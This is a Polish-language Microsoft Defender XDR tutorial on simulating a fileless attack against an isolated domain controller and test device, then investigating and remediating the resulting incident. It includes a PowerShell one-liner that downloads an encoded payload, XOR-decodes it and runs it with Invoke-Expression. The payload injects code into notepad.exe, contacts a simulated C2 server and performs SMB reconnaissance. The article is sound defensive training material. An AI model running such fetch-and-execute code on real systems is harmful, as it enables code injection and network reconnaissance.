Udostępnij przez

Uruchamianie symulacji ataku w środowisku pilotażowym Microsoft Defender XDR

  • Artykuł

Ten artykuł jest krokiem 1 z 2 w procesie badania i reagowania na zdarzenie w Microsoft Defender XDR przy użyciu środowiska pilotażowego. Aby uzyskać więcej informacji na temat tego procesu, zobacz artykuł omówienie .

Po przygotowaniu środowiska pilotażowego nadszedł czas, aby przetestować możliwości reagowania Microsoft Defender XDR na zdarzenia oraz zautomatyzowanego badania i korygowania, tworząc zdarzenie z symulowanym atakiem i korzystając z portalu Microsoft Defender w celu zbadania i reagowania.

Zdarzenie w Microsoft Defender XDR to kolekcja skorelowanych alertów i skojarzonych danych, które składają się na historię ataku.

Usługi i aplikacje platformy Microsoft 365 tworzą alerty w przypadku wykrycia podejrzanego lub złośliwego zdarzenia lub działania. Poszczególne alerty dostarczają cennych wskazówek dotyczących zakończonego lub trwającego ataku. Jednak ataki zwykle stosują różne techniki względem różnych typów jednostek, takich jak urządzenia, użytkownicy i skrzynki pocztowe. Wynikiem jest wiele alertów dla wielu jednostek w dzierżawie.

Uwaga

Jeśli dopiero rozpoczynasz analizę zabezpieczeń i reagowanie na zdarzenia, zobacz przewodnik Reagowanie na pierwsze zdarzenie, aby zapoznać się z przewodnikiem po typowym procesie analizy, korygowania i przeglądu po zdarzeniu.

Symulowanie ataków za pomocą portalu Microsoft Defender

Portal Microsoft Defender ma wbudowane możliwości tworzenia symulowanych ataków na środowisko pilotażowe:

Ochrona usługi Office 365 w usłudze Defender Szkolenie z symulacji ataków

Ochrona usługi Office 365 w usłudze Defender z Microsoft 365 E5 lub Ochrona usługi Office 365 w usłudze Microsoft Defender plan 2 obejmuje szkolenie symulacji ataków na potrzeby ataków wyłudzających informacje. Podstawowe kroki to:

  1. Twórca symulacji

    Aby uzyskać instrukcje krok po kroku dotyczące tworzenia i uruchamiania nowej symulacji, zobacz Symulowanie ataku wyłudzania informacji.

  2. Twórca ładunku

    Aby uzyskać instrukcje krok po kroku dotyczące sposobu tworzenia ładunku do użycia w symulacji, zobacz Twórca niestandardowy ładunek do trenowania symulacji ataków.

  3. Uzyskiwanie szczegółowych informacji

    Aby uzyskać instrukcje krok po kroku dotyczące uzyskiwania szczegółowych informacji za pomocą raportowania, zobacz Uzyskiwanie szczegółowych informacji poprzez trenowanie symulacji ataków.

Aby uzyskać więcej informacji, zobacz Symulacje.

Samouczki dotyczące ataków w usłudze Defender for Endpoint & symulacje

Oto symulacje usługi Defender for Endpoint firmy Microsoft:

  • Dokument porzuca tylne drzwi
  • Zautomatyzowane badanie (tylne wejście)

Istnieją dodatkowe symulacje ze źródeł innych firm. Istnieje również zestaw samouczków.

Dla każdej symulacji lub samouczka:

  1. Pobierz i przeczytaj odpowiedni podany dokument.

  2. Pobierz plik symulacji. Możesz pobrać plik lub skrypt na urządzenie testowe, ale nie jest to obowiązkowe.

  3. Uruchom plik symulacji lub skrypt na urządzeniu testowym zgodnie z instrukcjami w dokumencie przewodnika.

Aby uzyskać więcej informacji, zobacz Experience Ochrona punktu końcowego w usłudze Microsoft Defender through simulated attack (Środowisko Ochrona punktu końcowego w usłudze Microsoft Defender przez symulowany atak).

Symulowanie ataku za pomocą izolowanego kontrolera domeny i urządzenia klienckiego (opcjonalnie)

W tym opcjonalnym ćwiczeniu reagowania na zdarzenia zasymulujesz atak na izolowany kontroler domeny Active Directory Domain Services (AD DS) i urządzenie z systemem Windows przy użyciu skryptu programu PowerShell, a następnie zbadasz, skorygujesz i rozwiążesz zdarzenie.

Najpierw należy dodać punkty końcowe do środowiska pilotażowego.

Dodawanie punktów końcowych środowiska pilotażowego

Najpierw należy dodać izolowany kontroler domeny usług AD DS i urządzenie z systemem Windows do środowiska pilotażowego.

  1. Sprawdź, czy dzierżawa środowiska pilotażowego włączyła Microsoft Defender XDR.

  2. Sprawdź, czy kontroler domeny:

  3. Sprawdź, czy urządzenie testowe:

Jeśli używasz dzierżawy i grup urządzeń, utwórz dedykowaną grupę urządzeń dla urządzenia testowego i wypchnij ją na najwyższy poziom.

Jedną z alternatyw jest hostowanie kontrolera domeny usług AD DS i testowanie urządzenia jako maszyn wirtualnych w usługach infrastruktury platformy Microsoft Azure. Możesz użyć instrukcji w fazie 1 przewodnika po symulowanym laboratorium testowym przedsiębiorstwa, ale pominąć tworzenie maszyny wirtualnej APP1.

Oto wynik.

Środowisko ewaluacji korzystające z symulowanego przewodnika laboratorium testowego przedsiębiorstwa

Zasymulujesz zaawansowany atak, który wykorzystuje zaawansowane techniki, aby ukryć się przed wykryciem. Atak wylicza otwarte sesje bloku komunikatów serwera (SMB) na kontrolerach domeny i pobiera ostatnie adresy IP urządzeń użytkowników. Ta kategoria ataków zwykle nie obejmuje plików porzuconych na urządzeniu ofiary i występuje wyłącznie w pamięci. "Żyją poza ziemią" przy użyciu istniejących narzędzi systemowych i administracyjnych i wprowadzają swój kod do procesów systemowych, aby ukryć ich wykonywanie. Takie zachowanie pozwala im uniknąć wykrywania i utrwalania się na urządzeniu.

W tej symulacji nasz przykładowy scenariusz rozpoczyna się od skryptu programu PowerShell. W świecie rzeczywistym użytkownik może zostać oszukany na uruchomienie skryptu lub skrypt może zostać uruchomiony z połączenia zdalnego do innego komputera z wcześniej zainfekowanego urządzenia, co oznacza, że osoba atakująca próbuje przenieść się później w sieci. Wykrywanie tych skryptów może być trudne, ponieważ administratorzy często uruchamiają skrypty zdalnie w celu wykonywania różnych działań administracyjnych.

Atak programu PowerShell bez plików z wstrzyknięciem procesu i atakiem rekonesansu SMB

Podczas symulacji atak wprowadza kod powłoki do pozornie niewinnego procesu. Scenariusz wymaga użycia notepad.exe. Wybraliśmy ten proces do symulacji, ale osoby atakujące najprawdopodobniej będą kierować długotrwały proces systemowy, taki jak svchost.exe. Następnie kod powłoki kontaktuje się z serwerem poleceń i kontroli osoby atakującej (C2), aby otrzymać instrukcje dotyczące kontynuowania. Skrypt próbuje wykonać zapytania rekonesansu względem kontrolera domeny (DC). Rekonesans umożliwia atakującemu uzyskanie informacji o ostatnich informacjach logowania użytkownika. Gdy osoby atakujące mają te informacje, mogą przenieść się później w sieci, aby przejść do określonego konta poufnego

Ważna

Aby uzyskać optymalne wyniki, postępuj zgodnie z instrukcjami symulacji ataku tak ściśle, jak to możliwe.

Uruchamianie izolowanej symulacji ataku kontrolera domeny usług AD DS

Aby uruchomić symulację scenariusza ataku:

  1. Upewnij się, że środowisko pilotażowe obejmuje izolowany kontroler domeny usług AD DS i urządzenie z systemem Windows.

  2. Zaloguj się do urządzenia testowego przy użyciu konta użytkownika testowego.

  3. Otwórz okno Windows PowerShell na urządzeniu testowym.

  4. Skopiuj następujący skrypt symulacji:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Uwaga

    Jeśli otworzysz ten artykuł w przeglądarce internetowej, mogą wystąpić problemy z kopiowaniem pełnego tekstu bez utraty określonych znaków lub wprowadzenia dodatkowych podziałów wierszy. Jeśli tak jest, pobierz ten dokument i otwórz go w programie Adobe Reader.

  5. Wklej i uruchom skopiowany skrypt w oknie programu PowerShell.

Uwaga

Jeśli używasz programu PowerShell przy użyciu protokołu pulpitu zdalnego (RDP), użyj polecenia Tekst schowka typu w kliencie RDP, ponieważ klawisz skrótu CTRL-V lub metoda kliknięcia prawym przyciskiem myszy może nie działać. Ostatnie wersje programu PowerShell czasami również nie akceptują tej metody, być może trzeba będzie najpierw skopiować do Notatnika w pamięci, skopiować ją na maszynę wirtualną, a następnie wkleić do programu PowerShell.

Kilka sekund później zostanie otwarta aplikacja Notatnik. Do Notatnika zostanie wprowadzony symulowany kod ataku. Pozostaw automatycznie wygenerowane wystąpienie Notatnika otwarte, aby korzystać z pełnego scenariusza.

Symulowany kod ataku podejmie próbę komunikacji z zewnętrznym adresem IP (symulując serwer C2), a następnie podejmie próbę rozpoznania kontrolera domeny za pośrednictwem protokołu SMB.

Ten komunikat zostanie wyświetlony w konsoli programu PowerShell po zakończeniu wykonywania tego skryptu:

ran NetSessionEnum against [DC Name] with return code result 0

Aby wyświetlić funkcję Zautomatyzowane zdarzenia i reagowanie w działaniu, pozostaw otwarty proces notepad.exe. Zobaczysz, że zautomatyzowane zdarzenia i reagowanie zatrzymują proces Notatnika.

Badanie incydentu pod kątem symulowanego ataku

Uwaga

Zanim przeprowadzimy Cię przez tę symulację, watch poniższego filmu wideo, aby zobaczyć, jak zarządzanie zdarzeniami pomaga połączyć powiązane alerty w ramach procesu badania, gdzie można je znaleźć w portalu i jak może pomóc w operacjach zabezpieczeń:

Przechodząc do punktu widzenia analityka SOC, możesz teraz rozpocząć badanie ataku w portalu Microsoft Defender.

  1. Otwórz portal Microsoft Defender.

  2. W okienku nawigacji wybierz pozycję Incydenty & Zdarzenia alertów>.

  3. Nowe zdarzenie symulowanego ataku pojawi się w kolejce zdarzeń.

    Przykład kolejki zdarzeń

Badanie ataku jako pojedynczego incydentu

Microsoft Defender XDR koreluje analizę i agreguje wszystkie powiązane alerty i badania z różnych produktów w jedną jednostkę zdarzenia. W ten sposób Microsoft Defender XDR pokazuje szerszą historię ataku, umożliwiając analitykowi SOC zrozumienie złożonych zagrożeń i reagowanie na nie.

Alerty generowane podczas tej symulacji są skojarzone z tym samym zagrożeniem i w rezultacie są automatycznie agregowane jako pojedyncze zdarzenie.

Aby wyświetlić zdarzenie:

  1. Otwórz portal Microsoft Defender.

  2. W okienku nawigacji wybierz pozycję Incydenty & Zdarzenia alertów>.

  3. Wybierz najnowszy element, klikając okrąg znajdujący się po lewej stronie nazwy zdarzenia. Panel boczny wyświetla dodatkowe informacje o zdarzeniu, w tym wszystkie powiązane alerty. Każde zdarzenie ma unikatową nazwę, która opisuje go na podstawie atrybutów alertów, które zawiera.

    Alerty wyświetlane na pulpicie nawigacyjnym można filtrować na podstawie zasobów usługi: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Ochrona punktu końcowego w usłudze Microsoft Defender, Microsoft Defender XDR i Ochrona usługi Office 365 w usłudze Microsoft Defender.

  4. Wybierz pozycję Otwórz stronę zdarzenia , aby uzyskać więcej informacji o zdarzeniu.

    Na stronie Zdarzenie można wyświetlić wszystkie alerty i informacje związane ze zdarzeniem. Informacje te obejmują jednostki i zasoby, które są zaangażowane w alert, źródło wykrywania alertów (takie jak Microsoft Defender for Identity lub Ochrona punktu końcowego w usłudze Microsoft Defender) oraz przyczynę ich łączenia. Przeglądanie listy alertów o zdarzeniu pokazuje postęp ataku. W tym widoku można wyświetlić i zbadać poszczególne alerty.

    Możesz również kliknąć pozycję Zarządzaj incydentem z menu po prawej stronie, aby oznaczyć zdarzenie, przypisać je do siebie i dodać komentarze.

Przejrzyj wygenerowane alerty

Przyjrzyjmy się niektórym alertom wygenerowanym podczas symulowanego ataku.

Uwaga

Omówimy tylko kilka alertów wygenerowanych podczas symulowanego ataku. W zależności od wersji systemu Windows i produktów Microsoft Defender XDR uruchomionych na urządzeniu testowym może zostać wyświetlonych więcej alertów, które pojawią się w nieco innej kolejności.

Przykład wygenerowanego alertu

Alert: Zaobserwowano wstrzyknięcie podejrzanego procesu (źródło: Ochrona punktu końcowego w usłudze Microsoft Defender)

Zaawansowani atakujący używają zaawansowanych i niewidocznych metod do utrwalania się w pamięci i ukrywania się przed narzędziami do wykrywania. Jedną z typowych technik jest działanie z poziomu procesu zaufanego systemu, a nie złośliwego pliku wykonywalnego, co utrudnia narzędziom wykrywania i operacjom zabezpieczeń wykrycie złośliwego kodu.

Aby umożliwić analitykom SOC przechwytywanie tych zaawansowanych ataków, czujniki pamięci głębokiej w Ochrona punktu końcowego w usłudze Microsoft Defender zapewniają naszej usłudze w chmurze bezprecedensowy wgląd w różne techniki wstrzykiwania kodu między procesami. Na poniższej ilustracji pokazano, jak usługa Defender dla punktu końcowego wykryła i zaalarmowała o próbie wstrzyknięcia kodu w celu notepad.exe.

Przykład alertu dotyczącego wstrzyknięcia potencjalnie złośliwego kodu

Alert: Nieoczekiwane zachowanie obserwowane przez przebieg procesu bez argumentów wiersza polecenia (Źródło: Ochrona punktu końcowego w usłudze Microsoft Defender)

Ochrona punktu końcowego w usłudze Microsoft Defender wykrywanie często jest ukierunkowane na najczęstszy atrybut techniki ataku. Ta metoda zapewnia trwałość i podnosi poprzeczkę dla osób atakujących, aby przełączyć się na nowszą taktykę.

Stosujemy algorytmy uczenia na dużą skalę, aby ustalić normalne zachowanie typowych procesów w organizacji i na całym świecie oraz watch, gdy te procesy wykazują nietypowe zachowania. Te nietypowe zachowania często wskazują, że wprowadzono zbędny kod i działa on w procesie zaufanym w inny sposób.

W tym scenariuszu proces notepad.exe wykazuje nietypowe zachowanie obejmujące komunikację z lokalizacją zewnętrzną. Ten wynik jest niezależny od określonej metody używanej do wprowadzania i wykonywania złośliwego kodu.

Uwaga

Ponieważ ten alert jest oparty na modelach uczenia maszynowego, które wymagają dodatkowego przetwarzania zaplecza, wyświetlenie tego alertu w portalu może zająć trochę czasu.

Zwróć uwagę, że szczegóły alertu obejmują zewnętrzny adres IP — wskaźnik, którego można użyć jako tabeli przestawnej, aby rozwinąć badanie.

Wybierz adres IP w drzewie procesu alertu, aby wyświetlić stronę szczegółów adresu IP.

Przykład nieoczekiwanego zachowania przebiegu procesu bez argumentów wiersza polecenia

Na poniższej ilustracji przedstawiono stronę szczegółów wybranego adresu IP (kliknięcie adresu IP w drzewie procesu alertu).

Przykład strony szczegółów adresu IP

Alert: Rekonesans adresów IP i użytkowników (SMB) (źródło: Microsoft Defender for Identity)

Wyliczenie przy użyciu protokołu Bloku komunikatów serwera (SMB) umożliwia osobom atakującym uzyskanie ostatnich informacji logowania użytkownika, które ułatwiają im późniejsze przechodzenie przez sieć w celu uzyskania dostępu do określonego konta poufnego.

Podczas tego wykrywania alert jest wyzwalany, gdy wyliczenie sesji SMB jest uruchamiane względem kontrolera domeny.

Przykład alertu Microsoft Defender for Identity dla rekonesansu adresów IP i użytkownika

Przejrzyj oś czasu urządzenia za pomocą Ochrona punktu końcowego w usłudze Microsoft Defender

Po zapoznaniu się z różnymi alertami w tym zdarzeniu przejdź z powrotem do strony zdarzenia, która została zbadana wcześniej. Wybierz kartę Urządzenia na stronie zdarzenia, aby przejrzeć urządzenia biorące udział w tym zdarzeniu zgłoszone przez Ochrona punktu końcowego w usłudze Microsoft Defender i Microsoft Defender for Identity.

Wybierz nazwę urządzenia, na którym przeprowadzono atak, aby otworzyć stronę jednostki dla danego urządzenia. Na tej stronie można zobaczyć alerty, które zostały wyzwolone i powiązane zdarzenia.

Wybierz kartę Oś czasu , aby otworzyć oś czasu urządzenia i wyświetlić wszystkie zdarzenia i zachowania obserwowane na urządzeniu w kolejności chronologicznej, przeplatane z zgłoszonymi alertami.

Przykład osi czasu urządzenia z zachowaniami

Rozszerzenie niektórych bardziej interesujących zachowań zapewnia przydatne szczegóły, takie jak drzewa procesów.

Na przykład przewiń w dół do momentu znalezienia zdarzenia alertu Zaobserwowano wstrzyknięcie podejrzanego procesu. Wybierz powershell.exe wstrzyknięty w celu notepad.exe zdarzenia procesu poniżej, aby wyświetlić pełne drzewo procesów dla tego zachowania w grafie Jednostki zdarzeń w okienku bocznym. Użyj paska wyszukiwania do filtrowania w razie potrzeby.

Przykład drzewa procesów dla wybranego zachowania tworzenia pliku programu PowerShell

Przejrzyj informacje o użytkowniku za pomocą Microsoft Defender for Cloud Apps

Na stronie zdarzenia wybierz kartę Użytkownicy , aby wyświetlić listę użytkowników biorących udział w ataku. Tabela zawiera dodatkowe informacje o poszczególnych użytkownikach, w tym wynik priorytetu badania każdego użytkownika.

Wybierz nazwę użytkownika, aby otworzyć stronę profilu użytkownika, na której można przeprowadzić dalsze badania. Przeczytaj więcej na temat badania ryzykownych użytkowników.

Strona użytkownika usługi Defender for Cloud Apps

Zautomatyzowane badanie i korygowanie

Uwaga

Zanim przeprowadzimy Cię przez tę symulację, watch poniższego filmu wideo, aby zapoznać się z tym, czym jest zautomatyzowane samonaprawianie, gdzie można go znaleźć w portalu i jak może pomóc w operacjach zabezpieczeń:

Wróć do zdarzenia w portalu Microsoft Defender. Na karcie Badania na stronie Incydent przedstawiono zautomatyzowane badania, które zostały wyzwolone przez Microsoft Defender for Identity i Ochrona punktu końcowego w usłudze Microsoft Defender. Poniższy zrzut ekranu przedstawia tylko zautomatyzowane badanie wyzwolone przez usługę Defender dla punktu końcowego. Domyślnie usługa Defender for Endpoint automatycznie koryguje artefakty znalezione w kolejce, co wymaga korygowania.

Przykład zautomatyzowanych dochodzeń związanych ze zdarzeniem

Wybierz alert, który wyzwolił badanie, aby otworzyć stronę Szczegóły badania . Zostaną wyświetlone następujące szczegóły:

  • Alerty, które wyzwoliły automatyczne badanie.
  • Dotyczy to użytkowników i urządzeń. Jeśli wskaźniki zostaną znalezione na dodatkowych urządzeniach, zostaną również wyświetlone te dodatkowe urządzenia.
  • Lista dowodów. Odnaleziono i przeanalizowano jednostki, takie jak pliki, procesy, usługi, sterowniki i adresy sieciowe. Te jednostki są analizowane pod kątem możliwych relacji z alertem i oceniane jako niegroźne lub złośliwe.
  • Znaleziono zagrożenia. Znane zagrożenia, które można znaleźć podczas badania.

Uwaga

W zależności od czasu automatyczne badanie może być nadal uruchomione. Poczekaj kilka minut na ukończenie procesu, zanim zbierzesz i przeanalizujesz dowody i przejrzyj wyniki. Odśwież stronę Szczegóły badania , aby uzyskać najnowsze wyniki.

Przykład strony Szczegóły badania

Podczas zautomatyzowanego badania Ochrona punktu końcowego w usłudze Microsoft Defender zidentyfikować proces notepad.exe, który został wprowadzony jako jeden z artefaktów wymagających korygowania. Usługa Defender for Endpoint automatycznie zatrzymuje wstrzyknięcie podejrzanego procesu w ramach zautomatyzowanego korygowania.

Widać ,notepad.exe zniknąć z listy uruchomionych procesów na urządzeniu testowym.

Rozwiązywanie zdarzenia

Po zakończeniu badania i potwierdzeniu, że zostało ono skorygowane, należy rozwiązać ten problem.

Na stronie Zdarzenie wybierz pozycję Zarządzaj zdarzeniem. Ustaw stan na Rozwiązywanie zdarzenia i wybierz pozycję Prawdziwy alert dla klasyfikacji i testowania zabezpieczeń na potrzeby określania.

Przykład strony zdarzeń z otwartym panelem Zarządzanie incydentami, na którym można kliknąć przełącznik, aby rozwiązać problem z incydentem

Gdy zdarzenie zostanie rozwiązane, rozpozna wszystkie skojarzone alerty w portalu Microsoft Defender i powiązanych portalach.

Spowoduje to podsumowanie symulacji ataków na potrzeby analizy incydentów, zautomatyzowanego badania i rozwiązywania zdarzeń.

Następny krok

Możliwości Microsoft Defender XDR reagowania na zdarzenia

Krok 2 z 2. Spróbuj Microsoft Defender XDR możliwości reagowania na zdarzenia

Twórca środowiska oceny Microsoft Defender XDR

Porada

Chcesz dowiedzieć się więcej? Zaangażuj się w społeczność rozwiązań zabezpieczających firmy Microsoft w naszej społeczności technicznej Społeczność techniczna usługi Microsoft Defender XDR.